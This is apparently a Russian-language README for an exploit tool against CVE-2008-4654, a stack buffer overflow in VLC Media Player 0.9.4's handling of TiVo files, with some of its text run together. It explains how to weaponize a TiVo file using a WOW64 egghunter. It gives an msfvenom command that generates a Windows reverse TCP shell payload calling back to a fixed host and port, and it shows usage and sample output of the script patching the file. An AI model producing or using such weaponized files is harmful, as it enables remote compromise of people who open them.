
Полностью рабочий эксплойт для уязвимости переполнения буфера на стеке в VideoLan's VLC Media Player 0.9.4 при обработке файлов TiVo.
Полнофункциональный эксплойт для уязвимости переполнения буфера на стеке CVE-2008-4654 в VideoLan's VLC Media Player 0.9.4 при обработке TiVo-файлов. Он нацелен на 32-битный бинарник, работающий на 64-битной системе Windows, и использует WOW64-еггхантер для обхода ограниченного пространства стека.
Обновите скрипт:
buf = b'[...]' в скрипте на ваш собственный шеллкод (например, из msfvenom).EGG_HUNTER_WOW64, если вы хотите другой тег или используете собственный еггхантер.python .\CVE-2008-4654.py --help
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - от Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
использование: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT
Преобразует заданный TiVo-файл в оружие с предопределенным шеллкодом.
опции:
-h, --help показать это справочное сообщение и выйти
--input INPUT Путь к входному TiVo-файлу для преобразования в оружие.
--output OUTPUT Путь, куда будет сохранен измененный (преобразованный в оружие) TiVo-файл.
TIVO_PES_FILEID) в TiVo-файле.b"\x00\x00\x00\xff", что создает чтение за границами, приводящее к переполнению стека.TIVO_PES_FILEID) пользовательской полезной нагрузкой.w00tw00t.msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'
buf = b'[...]' ранее созданным шеллкодом.PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - от Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty